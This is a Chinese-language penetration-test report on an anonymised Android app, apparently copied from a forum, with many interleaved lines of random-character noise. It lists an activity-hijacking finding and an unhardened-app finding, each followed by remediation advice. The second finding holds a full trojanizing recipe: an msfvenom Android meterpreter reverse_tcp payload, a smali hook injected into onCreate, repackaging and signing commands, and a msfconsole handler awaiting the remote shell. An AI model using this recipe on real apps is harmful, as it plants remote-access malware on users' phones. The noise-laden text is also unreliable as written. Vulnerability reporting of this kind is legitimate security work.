6 E) }# j! j9 o" e
表1-2 测试结果 6 S4 C V! o2 `& q
- C8 \: X" \% h2 a& a
6 S4 p4 N" O+ @+ y2 @% S5 q/ w( r( b7 C; x4 X- N$ {' Q0 v' \
9 U: d# H9 u1 o. V( C# `% c% U, y% o1 U: `# y& I' |' Q
& ^6 G! m$ N% k, Y* |
' e3 w3 B& k) o4 u+ G$ j: }
0 T+ Y8 s2 d& T6 k/ X) E. |
/ l6 i5 e1 ]+ \5 O: G# A
: @$ P. l& X( Y2 ]/ {- U$ n" l! y0 S- ^2 I# {4 m
2 检测结果
) E1 f: f5 G5 ~
1 [4 C8 K2 H7 w+ ^! J% \$ {, c
; O2 V4 e! G2 X: h% q; ^& s ^6 j. S5 S; v, [( b7 M) t1 G q
0 s$ b4 c+ k6 A- j0 h6 @& U
' T( ~. |. }! Z1 [
2.1 某某某
8 {2 t$ M/ A y2 k1 Z) i. N6 U' o6 H! n5 y; e
# m" A( |$ ]2 d0 i- J- O3 W- \8 B- y( M" w0 E7 `
. U7 W1 @7 U( T4 N+ C
, _% u; {3 Z% I 2.1.1检测目标
4 @, i# D/ {. o9 U3 v- N! n9 l; Y, i2 j4 E
" i2 U) W; c4 W8 r
4 D) d/ D7 i& D1 A" c. i! u1 s1 ?- o, N, A% O' S+ ?
; C9 D/ @1 r% r7 W Z
! D6 ~ G- v; f8 d0 Y/ k8 J; d' k: Y 目标地址: 某某某某某某APP 0 B4 W) _% L$ d9 g/ ^/ C& J
" P5 m: |$ x; J Z6 {3 d3 ]7 E) Y
2 M, m& I& J/ p. E' j4 ^$ C! C: ~- O. t9 {' b# V$ S
" j B/ w6 C0 i- ?* z$ \
9 r$ r! R, |, g+ w 2.1.2检测结果
w% t3 w$ v1 y+ K8 M
$ b* D0 g2 X$ v
" y2 X8 e6 i4 j
8 b) [- {$ x1 I0 z' h. U4 ?
& G1 c, J3 F) L# F6 c/ j! Z* @; t) `
2 H- E- e5 ]! D' `3 Y* \$ u
2.1.2.1
3 t+ i- s0 [; i7 F6 N
3 g% j" v ~7 f# L% G' b1 {
3 g0 G3 g) d6 p v+ A% n- [
& x5 @: d8 l' E$ ^1 S ( Y. } v* i: c4 w: u0 j# Y
5 i9 y7 j( W& V" G, _
漏洞链接地址:某某某某某某APP
4 ^; V9 B6 ~' N' l( Q' p L- ]* R& }! r: q
/ _$ V' z+ g1 V& r) s" h! D {+ k2 r& e, V
; p- [: Z) x; K
9 _* m% Q- `7 J6 ~6 C0 V1 f$ ~ & M O" K2 V) y2 H4 H
3 g' i3 Y9 N* t- v" s9 M4 U% K
1 ?2 o7 a5 C) o! F. U5 k) L( m: J1 ?- y# [. X
- \6 W& S4 p* } ~/ h9 M
. j& u8 H8 q* W5 k4 M
漏洞分析及取证: 1 o3 I; c, O5 r' g6 P4 a
6 U: @7 ~ P2 X9 m. Q9 O+ i
' s$ C" H" T' ~1 b6 p; s. B
2 N& ^+ ~2 n! `+ Q8 R# Y
! w1 O( F+ N6 B
6 q" u) k- F; w
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
) s. y/ Y5 I2 F3 A7 k" z
) n0 Q5 |& P2 `" ^% x
5 W5 j9 y9 w8 N# Z1 x( D# q- K* k" [# f& e8 o1 f
# R7 ^$ a. F! G" t7 d
( }! H! Q& w2 y6 E0 g! [3 j9 K- x
6 p0 ~. z! v2 h) h5 C1 ?
h3 F, f) H* j' s
' v& } A1 `! v2 Z* F) u$ E
. J1 j" \6 u/ a! j/ e8 [$ X
( v8 u4 k3 `) D! e3 f# a, Q% _$ F8 I$ B
( s) i* Z" O0 y T. O* S% ?" j
/ q# `" I( d' f8 L5 h* M! H) y1 N
6 ^( B% Z$ j9 g+ A( a! R- c; Y2 ^: V$ D& v; j9 }" @
/ U( R/ y4 W( _; w, r8 L
: h* u1 I! H" N) w
1 d6 l$ a, m; L# V0 k' n( w: g6 h" ^2 G& U4 z K5 w4 U4 Y
6 \% F3 {0 `- F8 C0 h% p" A
+ ]7 R( Y& n* p7 i6 u- p* ]
; h8 c: s n+ G7 t1 i
K9 Y S+ V0 W G
( w! n+ U3 r* U2 z# x
% @7 r) g, K% `1 b- s
# P- r5 B9 U" P5 h) n3 M1 L2 X# `+ }1 [$ t5 p+ b9 a8 ^
! x0 _6 a4 X6 Z+ b: i0 c L
, c5 M% ?; u ^7 j
~. S; Z' b. {5 J1 v3 e2 K
! p( y3 Q8 @8 `. S7 a% U
$ E% R. f) X" F' E, ?
+ H4 Y; ]* X5 K! b
) Q: B% p, T1 [+ k2 C) b1 ?5 y& f. x5 F
0 L7 R; o$ Z$ R: T$ z& V2 T* d o/ x
漏洞危害:高
, c& k3 i5 E+ [. P2 E1 i W* J- M5 e4 c
6 D1 r# c: U0 [ `+ O/ h' f+ L
' L* o$ A' a% r8 j
l# Z7 m* [8 d4 C# x% X$ i4 j: L; ]4 E L# p2 g* T
1 q8 g! \! j! ]& p! O# U! W/ t( e; d$ C7 h2 X
7 v' z8 p/ \+ E8 g q; u
$ n; H ]8 g o4 Y2 S( T
$ R& Q: }( P$ K/ J) s0 N, G
3 R3 e4 d/ a/ x# |2 a | Q9 p% Y! c: j" N" c7 ?* g3 s
+ K, p2 L Q# z( z0 J0 k
9 a# j! b+ n# P& o
1 J8 S1 C5 \7 D" T6 ^ 严重程度 / t' Y* y1 |: Q, }0 H3 a( @
% Z: L1 b9 P- B a+ \2 |% m
6 `3 Y+ `5 T- o4 I/ ?- a9 ?+ v" d7 B" }
|
% n2 w; F- D/ H% Z
# l! T- l9 }) `. r+ a8 E; Y & j: S8 i! _! d% _4 U& I' U0 T
* _0 i) S; A( D8 ]8 g W( ^: U
) M) i. F2 U1 \( m1 e. O$ q
! @" ?0 y" m, E" v' }+ e1 B
高
* g/ m3 Y8 A( c' S& ?* |! O
5 K3 I+ n4 r! w$ \9 c
) R2 Y7 i5 v2 F3 e7 S
+ d2 Y3 u# O/ i" A& H' Z( g" T+ Y5 u | 3 l7 ?: D# o/ O; Y& w- T' \+ X5 W
3 x8 ?2 h- _4 c) F: K* |. Q6 x+ U9 f# p
5 G1 ?+ o1 p2 A# T, l* r
( i; G$ v, c0 S6 {
$ L+ M7 t4 g. k* s7 ^8 L5 m8 _, v
j# Q" i8 w; V) @7 b q ■ + f4 }/ E8 U0 a$ P8 b
* f; K8 S) ^! Q" g & t6 w, _7 u* x3 |* I
: m2 ?' u" `. g3 M7 `* l( @
| 2 t9 E& O) q% z$ P8 p
' Y1 }% N! c9 } Z& E
: y) b' @2 R# E: w
1 T" d( S. h$ q/ `7 i/ m 6 g: r" S3 D3 ?
- D, G: M) G: ?* u. L* ~4 s# X 中
( @* W$ d' m }: m t5 C2 R$ |2 p! O, ]* Z- n: w
+ d' U0 N- \3 R7 c
5 ?* l. t# r0 m9 J2 F
| ' X0 t y/ g" b
/ Q p) {1 }2 b" V) Z
( @8 I0 v K4 ~) O0 M4 U' Q
( _. ^! K2 @. Q4 I! |, b: O, Y4 u ! A* q/ }8 W* }2 A/ S: A2 z8 u
) Z( R( K, N3 e# {. @3 H
' w) z* p4 c& b/ V
$ L7 d s: a- u, [0 k* x4 l + w' @$ F7 o/ b
: @. d! c, f, v | 3 b1 a. o9 t' h6 r" c& M
1 X% N. G6 C/ a
& Z/ _: |0 B* f z7 }% v% \- t5 g6 h u/ w+ G
n0 i: ~) F* s/ x) {9 v2 m. Q: ?' {9 `& B6 \4 H/ B
低 G1 ?9 K- u1 X9 J
! b4 W- _- B# U5 d9 p
+ d# I4 N+ d3 ~3 I
* h' a2 V- i9 r8 h6 |: r | 6 b/ K3 i3 S7 l8 j: t$ n/ L x
1 b9 D; l2 _- W5 g: @( y$ M' k
) ^% Z$ E) \+ ]' ~
2 ?3 w0 j4 h* h' A
! z) Z& h- Q% {4 W$ s, P& }! \3 u$ \) }* O7 L2 H) `
! D. p9 W' ], M9 O# s, R+ ~) R3 G# f
4 d# h# f6 ~* v( a6 S, u$ ? M E' C: K2 o$ M7 P/ `: z
|
6 z5 N1 [( d9 B* H& L4 `
3 b+ G+ U8 [. n( B; {
' T e+ a( k$ l4 T4 k
3 K' K- S4 T2 k# r8 e/ Z5 U
a }8 i% `/ p! ?+ k& X! I4 N* f6 G! O& L8 m! D k# C; t
* A& ^/ n* v u# I
: S1 A- W, i* l7 b/ o
6 o7 e# u) j9 u$ S6 [& Z# D L, m5 ^, n$ E6 Z) _
* j: k$ L; Q* f' y: S+ t- r2 {
- `( z2 C; Q- E/ q/ Y/ @
% \* t5 r( w9 l$ I7 E- y
* o& c. | E! c, P% ~ E
f, K' D7 X) a, x
* Q. V0 a* i2 H5 W: o+ p
6 j" s& i2 l$ B) o9 L6 P% n. H, |+ U9 X; C# h
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 0 K+ S$ d/ a$ `1 J
! o- x# ^: q8 J% J4 m8 f
Y' K: q4 B/ D e& I3 T
, |. `, e, u5 G3 @ w
+ L( {# M. W$ D" H/ D
0 n# \+ i/ f C
) o+ S( S" v- J( a9 \
' z# [; P! d/ O+ e
0 E+ {! t7 O" M8 b& ]& y
1 I7 Z! E. X* G% K+ A$ u1 F
1 W5 F/ N- o/ x$ u
. X$ V. B* i0 o" c8 x4 }2 T8 s
( i& l- i$ M% Z7 R9 `
1 v- i$ D4 ~9 }0 y% g: @* r
- g/ Z% J3 p* \: k9 R! m
" M1 }& ^! t* U% Q2 e 1 G f; a8 A9 P+ a
8 y6 d/ t0 X2 \% B' m1 z8 J
2.1.2.2 3 c7 i# b8 x, A. T0 _
4 M$ A* z* H$ h0 x
1 h2 R2 B0 u! W) w" Z% t* r" [
! k* q% J; n* R6 i* ?0 G: f! @ . F1 A0 m4 _. k% }
, K3 z: O* _$ S( R5 x 漏洞链接地址:某某某某某某APP 2 \1 M; E2 ^$ _4 T( U7 K; l
4 i! ^, ?8 H5 X9 c
1 B; O$ c0 V- B: ^. H+ \( \
4 L8 A4 m! z# B; i' `" |
3 ?$ m8 n8 ? S( s2 j: C; H, x: ^
漏洞分析及取证: / s* L7 L8 A+ c: l
* a; f q) p7 g5 D
% X) I8 F0 J0 P/ y* J H e8 w
0 [' l/ m9 s/ p" f. @
! t; o C. m$ ]; H2 }
8 r0 @+ {9 M/ `% R5 s 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
$ S- G# P+ k. s/ p; T. d- S S o$ T3 _0 K# K. N+ w/ i
) P% \8 c6 F* O" p3 R2 u8 M" u' d+ x
* c- S b5 x V- {4 E) c# j& a
L( \5 A# D( S 用Metasploit 生成木马 apk
2 h# T B I0 V* w. p8 }4 H
1 _; U; y. ]6 `
( H; `5 D0 h& I
( D& `0 e& @4 n
* ?8 {; s3 [' c: I9 }
- u/ p$ _/ v+ }4 D. v# V msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ; ^0 a/ w3 z# Z, `) G/ y- ]% n
. P2 u$ o; J+ a' i& |' s
) G7 l- ?# d, z7 c4 q9 `+ o& v, O6 B3 Z# A
/ M& Z0 H2 u$ p2 u
0 k3 w$ T5 e* |. L U# K4 i1 [/ Q" j0 p; w% E4 y$ A
反编译目标apk和木马apk
7 K8 ?# c2 G3 j W5 X' }4 [
* v/ u! x) n, j) T
' M- \8 v8 Y2 d6 u
8 R8 z3 a7 Q! X6 V, t' M! M: I
4 p0 C7 \% K3 j7 r' q1 Y j' Q& o. y7 k7 w( u5 i3 u
apktool d target.apk
* @' |+ j8 S* H) t& ^
. w) ]& i$ X5 {- p4 l
apktool d cockhorse.apk
8 J7 p! Q/ \! y3 {+ u
9 o% K: g9 X* F1 C! | Y
$ A6 d6 w+ I6 ]1 w, S* P
2 l7 @: k2 j. a% M
7 n+ `5 r8 `! e5 k2 _
% e& X8 T; R& t& [. R; O 木马 apk 注入目标 apk . v1 c+ U+ p' j- ]1 V+ g, y
4 H1 q" v( D. k3 j+ |3 M
; F& G; w4 q* q K
) k9 V9 s {+ c3 n6 i' k$ r; o
& t& {. P( |. P: F) j( ^
$ [$ b. P; g. y" g* J 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
* q. ~( z, k1 X7 b! L% t" F, Y; K. B! c
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ) E! Z4 z$ F2 H, a( S/ A5 j
, G) X% Y2 m6 {
8 O9 f" ~+ x! x& i) I
1 e0 S$ S1 b, Z
6 r+ S0 ?) _9 w1 h! Q' n
$ d/ E- } s" s$ w/ t 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 # V% ^( K( y) M- w$ q6 m
' F1 P* _, \8 K6 c A
0 M; o# ^+ E C9 F: B$ x: ~2 G0 R
9 o+ G, V, g( f5 T
& k% t* y5 B9 g6 B+ ?
% B8 g0 j, k C: t4 Z2 l R( t 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 % M: R$ Q/ r1 v2 g$ B
9 T- e# r5 U) V( l" F; Y
8 F' j! d# G/ {7 ]
7 a! n$ |: z0 i, ~# g% t: d 2 E8 m+ X0 y2 q t4 F
5 c0 e# z3 U& p- V! Z( H# {3 G- z
回编译生成最终 apk 2 p# t K2 O4 ~% O* Y+ S
7 H- T# p& ]" c2 V* w* w- M+ ]
5 x0 U' @! w1 I. v' X* C
* ^6 x6 x' z% n7 [, v( O
& X% f; N" x! J) f D% r
6 L7 p7 v3 J2 J( |, N 重新打包 - {; k* n w, b; u
. r# l1 j$ ?/ R6 V$ ?
1 K: P' l' B8 |" T& x7 Z! n* F$ V
# Z* x- I5 `5 c& h3 Q8 x
& ?3 h0 _3 L3 j$ u4 K. M3 y) A5 q' P+ c
apktool b -o repackage.apk target_app_floder * j* F3 E& `% H1 Z3 G; r5 @
$ m. V2 p. y5 G
2 [( Q$ ~6 z9 ^) T& _0 Z
* e. y4 g! \0 w* j( _- Y$ | 3 y( p9 [+ c9 ?' Y {
6 {, |- q- O3 ~8 w4 r( o
创建签名文件,有的话可忽略此步骤
2 v& C$ i1 q* l k- o; G* Y& d' h+ e! |- ]& F
! I# y1 e; \$ S' u3 O+ I+ w- Q: R" ]1 k. L- E+ U! v* N
% N3 j/ a5 _4 q2 t
& Y x3 m, c. g9 R% e7 M
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
( c4 j. Y2 ^1 A* T, i ~; S6 D( W* v
: t' @- i" |4 c& m, B! J. S+ U
0 n5 T4 K& H; U l7 V0 A5 ~5 S $ g4 d) `$ E0 Z6 H$ z, p: Y
3 }8 l5 @7 E/ K y( u+ T; {- l$ ^
签名,以下任选其一 3 R# N* @5 M& E% z
1 `4 x/ e; F2 r% _
6 B7 d/ C$ p# s$ g/ a- [5 m, H# W6 n. y; \
, a# h. O+ K& F. q
/ W$ `% G; I* i! r' Z jarsigner 方式 . G1 F' ~2 w* W: J' [- y7 `
. q9 ^; w* y3 |) H M: f
% x$ ~' n& t5 w$ p% C1 `* y% u! Z' R8 h0 I# u$ [3 b8 F, H/ S
7 G* r- s) E. ^& d8 B3 x
" ~- S9 l7 t7 |4 ]8 V$ ~8 L8 ?& V jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
" { B% p5 c7 s& V- {
+ a& A0 t2 b3 t0 e7 r
c& x/ A% m$ N" b% y6 Y8 }$ {4 C
# X' a5 l7 D- {6 U' |
: \9 ~5 t% h1 ~; T- j8 }- o& s apksigner 方式
. t" d7 P: Y, i& V' q9 D: V5 V5 b3 T0 C+ i6 K
: E- W ~: d- q* ]1 B: |; d) G: c- ~% l0 S. {
# W3 Q& I5 t! S( s1 ]! ?/ T7 I
3 S4 W) j; P G3 a2 y apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
$ N1 p& I" d5 b( ?6 h5 d5 y
) A% Q% s' p% d6 {" _) `" z
$ x& o5 c1 F" \6 h8 R' c" M9 W
2 y9 h* { F6 }6 X$ D
, o: y$ T1 v$ R1 C5 w7 O0 C
0 w5 ]% ?# s' y
如需要禁用 v2签名 添加选项--v2-signing-enabled false
. f1 V( m3 `7 B
* e1 a, M& u5 A- i2 Z# h
- p* g1 H. n# m
4 V; t. ~# o# t' c8 S m1 d
) f+ Y5 E- {5 l
e. J8 h% x2 G+ ] 验证,以下任选其一 ( ~1 m+ T- `. R9 {
' k' a' o7 s- I! V% o, q- o0 }
0 M9 N1 d z/ q0 C
& H' S' b7 }+ N2 ~
9 i" M T+ w4 R
/ k$ o' F$ ]) j6 F/ G6 b
jarsigner方式
P! S, P& A2 L {
& y: }: _ i* k
) Y; q. V4 _7 l+ p: U
2 ` K g" g/ m* R U A3 h, ` * M# S( K$ F! h5 X
# {* [+ S( w ~: D$ w X1 ^ jarsigner -verify repackaged.apk
' I4 i% K7 K# G' V" d3 r
, d- c, S! i9 `9 O
2 F+ h0 w' F M
" K4 w3 y2 j" @: [" G/ e5 k9 t
8 ]6 i I* ^# M% N. S' n
+ m4 r' @5 j6 q2 e; K1 q apksigner 方式 * {7 e$ w5 Z* N$ d$ z8 z
8 G) _5 L: n9 r/ b/ g; x# e3 y
! d! E) e5 p0 o3 J6 ]9 M
8 t; T. n9 A5 K# X/ c9 i7 j
- j! z! i0 \$ N" ^- u( O+ K1 a
: G- c) d3 _2 H& \; B: l" F. w8 _ apksigner verify -v --print-certs repackaged.apk 5 Y, i2 L3 ^5 F
7 P, T' ^8 T# L& a! b
9 p+ a K$ r+ z* a2 e }& d
5 F( w8 e j+ f& R
: @4 |2 P3 x! t9 o* E5 T
0 ]! A+ r- A6 ^; y keytool方式 2 i! p4 ]( v% H3 `
8 p2 E9 j+ w9 T1 a- m# `. M
5 A9 t0 c9 I4 a+ u# u& i% @) s# ^+ y0 v3 {9 ?! m+ {" Q( i, Y' d
0 x' f+ I7 s- N0 e9 o! W
. F9 Z4 |1 H2 X keytool -printcert -jarfile repackaged.apk 7 u3 p8 q/ Q5 L6 ]
# |: |; l( w) P
- ? _5 I- w2 ^9 l* H
3 q" a& b! T' r, B* q
% o- Q' v$ s% ?; |$ ^* s. v+ ^, z8 ?9 |( \( j
对齐
/ o* H* P- @8 N" e4 X+ o7 f
3 c/ m, O2 u. h
# w2 A& M0 f5 Y3 F3 ]1 C5 r- m" L9 o% K! a
4 N( L6 A) @0 w( @" K
* _( H& m/ g( k; @$ K" I6 Z
字节对齐优化 _( A7 _' ^: G
% e9 N& j4 w+ E& i9 o
% x- J. n8 [" H/ m1 { @
: }* ]" t0 l( o! y
8 D9 S( P5 `. P u. M: T3 o9 g! N! a2 _/ }) `: y5 r
zipalign -v 4 repackaged.apk final.apk * Q5 r0 a: v2 ]6 A$ X! y% O' [ g
/ t. p2 M |- I7 ~% C* K
3 z) k4 M# T, Z5 Z) x: u0 x
: d* N2 \+ }0 b6 S
* R& I2 {' V$ ^) P: f e% Y, z# w4 p0 B1 `$ ~. \% \' ?
检查是否对齐 % O! b1 ]' |2 B T O! f: ?# K
' ?2 x) k8 }4 F2 {
8 `& @& H; y+ m& Q" `% t0 t+ l% P4 h
( W4 x+ S. g% s0 c
) [5 o5 n$ J/ d x8 E* \ zipalign -c -v 4 final.apk $ e& f ]) O8 \' _
4 E! E3 ]+ D4 o; Q# o
/ i# R2 r+ v# |# o! b2 u
; U, W5 B% n3 ~ 9 N7 N: r$ g" U/ B. A0 m* V# c8 u
* ]+ ~; o( `% o1 t9 z% n
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 & `6 ?# f' Q# l
t' S- l9 S) ]$ u1 r6 U0 T% [
/ D5 C6 e' E2 E) g* h+ U4 f4 D" P) U u% S& ]( \
8 u( F: D# p6 [( {% \! X
- y% H/ K/ W& ~
启动Metasploit控制台,配置参数等待上线
4 s/ ^2 g. S3 H. {& Y5 O
8 k, k9 g% @ L( z5 _$ J- C
3 i# K. Q1 I8 K- f8 [
- @6 S' a9 \' A* L ( a# T5 k1 ?, e0 o3 |$ m( A
+ K$ H6 F; H5 ?& {6 S1 L
在终端依次输入如下命令
' O+ k' X4 D: ]& \$ X1 D
- A3 m. P( W& Q2 Q4 J) t8 C# l
3 m* i/ c# ^" ?5 k# {# ]) \
2 d& t! `" a- s8 I6 ] D; `4 v8 J
" h. j) C: j1 M8 A; b& I/ y
. M. P4 G1 e5 I* m$ J" l6 c) R+ h, J, o msfconsole
2 t" \; x6 L9 U# l8 C6 |0 S O% O5 @
: W! O9 n/ w/ ~8 J+ K
; L q9 h7 H2 w }6 h% u) Y9 q+ L
9 s! i7 c% q# K$ ~1 H# J' X9 ?3 C
use exploit/multi/handler
( E% S, m6 c( `! p2 N# r. `2 j! q8 U. E% E, a& H, {
- J6 h& H& m1 T4 f& B
8 p5 R {( D; I1 A; i9 L8 d5 f7 f
& U# M$ V$ W: R) F* X3 S7 ?4 T
) _3 \3 \8 P& G6 N9 n* k$ |! C( K/ q
set PAYLOAD android/meterpreter/reverse_tcp
. j* H* C+ L4 _: r: o: m! n, U# |/ `' z( Q! X# r1 Y
. Q* a) ~ q+ j
8 s6 R$ }7 _, b3 f3 y# x
# ^8 m5 Y+ G( u$ i
2 Z+ K* x/ B; f+ Y set LHOST 192.xxx.xx.xx
9 U4 V9 V' n* B- t
& [- V7 x) v; d8 i$ \
) H( F5 ]6 Q8 h- p1 d7 \* J9 P1 v1 n0 p, u
5 {9 J3 j- N! H3 [
5 x+ ~5 A! K* Y3 H x- ] set LPORT 4444
- S9 ~1 t, k& q& y5 M: s; @$ |- w- M: _; _) i3 o7 ?& {
, y0 \5 n# s: I, [% [$ e, K) w% X/ J$ g0 g: K0 g. O5 t
; w" d" C I% i: S7 e
& D& F+ A, l: k" z% S exploit 8 m- R" |2 P' e0 ~
: f8 C- U/ v: ^5 P/ e5 B0 i" C% s
# E7 ]+ E, i4 |. E: d' Q% L4 h3 S4 T' J1 D
7 k2 c, b) c/ H+ d
2 t) G6 `! M" P/ S" N 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
: z+ o9 ~' J( w
* n' E" X6 @& y$ M1 Y
6 p0 g; x6 w7 S& {0 E0 N# B5 V+ Q; t/ R! K7 s
" q o2 X K2 T; Q* Y
0 h9 M) }$ `# _ c; |- A8 s# J& s& n
漏洞危害:中 - j$ G7 E. }3 ]. u- e& L
9 H6 ^6 r0 A% E' U
0 O4 U, U* x9 c, F5 h5 _& }) C
! y9 y5 n8 @8 J" Y 5 i) @* ?/ y) J
/ ^2 I2 D% m0 {9 c4 O" @. ~) m
- u7 L0 x8 e. T8 D8 h7 l; X3 K' ]
3 Z( l+ r) e8 D: m! e7 m T, Q. Y
0 b; J( F8 y3 o. g' ]
& h3 V' ^! a: ~: D+ j- v" P( g 4 T( o" _" X0 x
: {! f7 b S6 e( m
4 n& ^" q6 F. L2 F8 s7 ]# ?' N0 B7 J. f# }" C: E( i |
|
$ V, |" T; E! x- C# X' v
# }0 V- e( [+ t$ }& B $ W# y1 l. G# e0 r, T) a$ Q6 \
- i& J$ _7 S) V5 ], g0 P. i: o
严重程度 & S' a. ^! s5 E6 j5 m" A ~2 i' |
c$ ~5 S3 S# ?9 q R; y, O : o4 ]* D. Q D
# n J& E& M* T* ]2 Q6 h
|
4 h# j0 h6 V7 r
3 s' n% H' ]; [ * z2 d# Y& Z( S- N5 P8 g" N
: M# }& f9 m2 Z$ U2 p; h. |; W1 a. ~
: E$ L1 `6 M4 R( U6 X
6 I( n3 _0 K' m* E! t, ] 高 8 P2 j6 F f, ]0 D
! l) ]7 L/ R( B$ |& T
; M! u4 D& o, t$ \* f
`. M& t2 u/ u# I: U |
0 Z( t" p9 ]- \9 z( c7 o. d' l" n
. S6 [& M J% r % y0 I- V+ R' }1 c# o
/ w& S; f" H& n! s# Y( S4 B - J, M7 l- ?; T: @
9 p1 c9 d- C* x9 O5 R+ ^2 d+ \
■
# P- g, e) L1 Y% A3 w
4 {: m. F, R2 x
4 q! b+ E$ P$ R) z9 @" k! [, l3 r _6 L( X( w$ q4 t/ f
|
2 Q1 S! a8 ?- Q" N. p/ p. P5 [3 U8 \2 D3 m$ k" u
1 K3 ]% n( R/ b) }% Z2 o
# p+ O! ]& Y4 | : a3 G' `+ }* _9 l
5 s. e" N- \1 o* F2 L
中 * G: |* R, y* S8 t
1 I0 p6 ? v8 y/ B
% R6 U' N% Z9 p2 o! d
' ^4 l9 ~1 W+ e
| 1 r: s. k2 Y0 n# U8 u# ]) j/ k; k' s
$ ~/ O+ r$ p! [' |& V ! M" a# B) q0 N- t3 r# q
2 J0 ^# a0 P- U6 |& G5 w& k$ E! e
( o5 } I P+ V
' u% V0 k( A4 I8 V
+ r5 S A' {. U3 t) Y
1 a8 ~, j' F4 C, }$ @7 S $ }; s. }( J3 Z+ C6 T, n
4 [ n2 {: ]7 \! o& |% s2 a. _: @
$ l& J& x" U; ~7 z e, Q& @6 }0 h8 h3 a+ F/ V( z
| , r6 ]0 P* p7 R* h2 q& Q% o
: T7 x$ l0 p+ L# r
$ m, x% @0 q8 R1 M
# p; `- D; i" V1 W5 b& Y ; [% {* A s. b/ n5 }# e
" s5 M5 p1 ~: O" Y1 n8 L
低 , G" x2 t0 L, A8 V7 I
+ F2 n; @- t% ~
3 k" ?! ?" i& G6 m& m- b" E% ~$ e3 ^! `, T
| / S* D5 v. D; i! b3 a4 ~* v; C
" w) K( E- k4 k' u; |7 a! [
z+ {; A; T! B
X- y* F% z3 P9 B A) ~
+ m7 h1 d; Q! P2 n; J
: |+ w/ Q" t& @
4 s' i8 y) r& i' b3 x1 [1 h. k' G
% F# J/ N6 c; p" e- X+ W6 x% t. K4 V
6 a5 ]# B! Z G; n. n
/ D1 V! V) J: ~: P# ^3 ? q
| " q- T0 }6 T. K: N: h- v1 \
- ?/ |+ ]. I' \" c/ a& R* d- [
* a$ s7 A, r# U# G/ i* n7 |& P* }! d( [1 o; H% D5 s
0 M1 E+ A9 E2 E' ` q% R
9 P: B4 J. z+ O7 t: V
+ K! s* ]6 a) n$ D1 [: q
) ]- O" w0 a, O9 B1 @$ m2 Z- ]3 ~+ y + z# @: e% h: n( e# W! B( [
2 v: Q1 ?* O; v- \6 W) g 8 y* _# u; }2 h4 _' G# U) C
" J( L) i: o% V3 Y8 ^ " U; g0 }+ K; s. G/ z: E
8 r8 ^' w; b8 B& C
# R& V; M- C( c5 q3 l
4 k+ z2 |% ~/ h
; Z2 F! t9 K% B5 m* ^2 h( N q( \; Y
修复方法: 7 d8 ?8 B. s1 q5 E
9 y9 Z9 z& J2 P/ S3 o: C R+ ]
+ y' Y% o7 W4 C9 l
5 p$ Y# k0 ]2 N3 w
/ k* r l+ N9 m9 q
. `# @) s3 r- G3 ~4 [6 g K 1.在 APP 启动时应做签名校验防止二次打包。
8 _. a' h1 ~6 |; s% ?
7 Y5 j# ?" D# ?5 K3 ~* x 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
9 f8 O1 \1 d6 R- v% P8 e$ Y: t; A6 c$ j- ^) K" h
9 Q2 Q0 Y9 c7 B
. E+ a) t" a9 f7 R* {$ X
}! ~7 d0 t# a
) J- M* m& U) U; y, I0 N - u: |9 t+ w" q; R2 O9 {! U; K1 o
! `3 x. i5 ?$ L6 x0 c1 e ) A" K# u3 I2 Y' w
6 `$ D8 k6 J' f5 M6 a1 T
# p8 C: x7 |$ a! J* Z9 ?6 a' s- z% D) o) |1 f1 A# j4 h, ^, U
; x9 U. V5 ?* l
; V$ A& S* s* \
+ b7 t; i0 @5 t8 B* j7 ?8 Y4 q- x0 M
4 i1 b- k( P* d' v/ f$ b" t6 a
7 p- g/ p: I* X' U) Q+ ^
5 \* Q% e3 l( B2 T# Y( x4 o+ D
2 T9 M/ w, ^4 V0 j) \6 U, |
+ x% {' _" Q; \; v, L' F: @7 @